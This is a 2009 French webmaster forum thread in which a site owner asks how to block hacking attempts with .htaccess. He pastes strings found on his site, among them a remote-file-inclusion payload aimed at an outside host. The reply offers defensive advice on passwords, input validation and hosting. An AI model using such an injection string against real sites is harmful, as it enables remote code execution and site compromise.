comment interdire les tentatives de piratage et les spam avec .htacces

Discussion dans 'URL Rewriting et .htaccess' créé par netweb, 14 Décembre 2009.

  1. netweb
    netweb WRInaute discret
    Inscrit:
    29 Juillet 2009
    Messages:
    114
    J'aime reçus:
    0
    bonjour

    Question 1:Est ce qu'il existent des codes à ajouter dans un fichier .htacces pour interdire les tentatives de pirate et spam ?

    sachant que j'ai trouvé aujourd'hui sur mon site les codes suivants

    "<iframe> </iframe>"

    "-SeRVeR[DoCuMeNT_RoOT]=http://creative-alchemy.com/zencart//media/id1.txt?"
    c'est qu'explique les tentatives de pirate.

    question 2:j'utilise un hébergement mutualisé, est ce que ces problèmes(ajout des codes de trojan .. sur mon site) peuvent être dû suite à des autres sites infectés se trouvant sur le même serveur de mon site.

    Question 3: Faut t'il désactiver le perl? pourquoi? et comment le faire si oui?

    merci
     
    #1 netweb, 14 Décembre 2009
  2. cthierry
    cthierry WRInaute passionné
    Inscrit:
    15 Janvier 2005
    Messages:
    2 236
    J'aime reçus:
    50
    Pourquoi tu ne continues pas sur ton premier post (je sais je me répète) bref tu mets des brides de demandes un peu partout alors que l'on pourrait tout regrouper en un seul et même post. Si tu travailles de cette manière là sur ton code...

    Bon déjà commencer par changer ton mot de passe ftp car si tu t'est fait craquer ton mot de passe, tu peux nettoyer 10/20 ou 30 fois le gars repassera pour polluer ton site.

    Ensuite voir si tu n'as pas un script ou une page récupérant des données qui ne serai pas assez sécurisé comme par exemple une non vérification des données reçus par une URL.

    Enfin contacter ton hebergeur afin de vérifier qu'il est bien a jour dans les mises à jour de sécurité, à mauvais hébergeur mauvaise sécurité :-D

    Pour perl je ne vois pas trop la nécessité de le désactiver si c'est à jour. Discussion dans le même genre:
    https://www.webrankinfo.com/forum/t/site-malveillant.114840/

    Ah, un vrai mot de passe c'est cela: jXp0%1d^m*XXbTM <= si ton hébergeur le supporte autrement oJ16gAp1LqehVZX.
     
    #2 cthierry, 14 Décembre 2009
(Vous devez vous identifier ou vous inscrire pour poster ici.)
Chargement...
Similar Threads - interdire tentatives piratage Forum Date
Site d'essai : quelle méthode pour interdire l'accès ? Développement d'un site Web ou d'une appli mobile Lundi à 12:06
Interdire l'indexation d'url interne en double Référencement Google 7 Janvier 2020
Néfaste au référencement : interdire aux visiteurs US ? Problèmes de référencement spécifiques à vos sites 10 Décembre 2019
L'attribut data-nosnippet pour interdire des textes dans les snippets Référencement Google 26 Septembre 2019
Interdire téléchargement fichiers Demandes d'avis et de conseils sur vos sites 18 Juillet 2019
Ai-je le droit d'interdire le partage du lien de ma chaîne YouTube(pour une raison quelconque). YouTube, Google Images et Google Maps 16 Décembre 2018
Interdire le crawl d une partie du site Débuter en référencement 15 Octobre 2018
Interdire indexation d'un contenu Administration d'un site Web 11 Septembre 2017
Comment interdire le crawl des pages de faibles valeurs (Noindex ; Nofollow ; Disallow ?) Débuter en référencement 22 Mars 2017
Interdire l'accès au un site aux concurrents Droit du web (juridique, fiscalité...) 30 Janvier 2017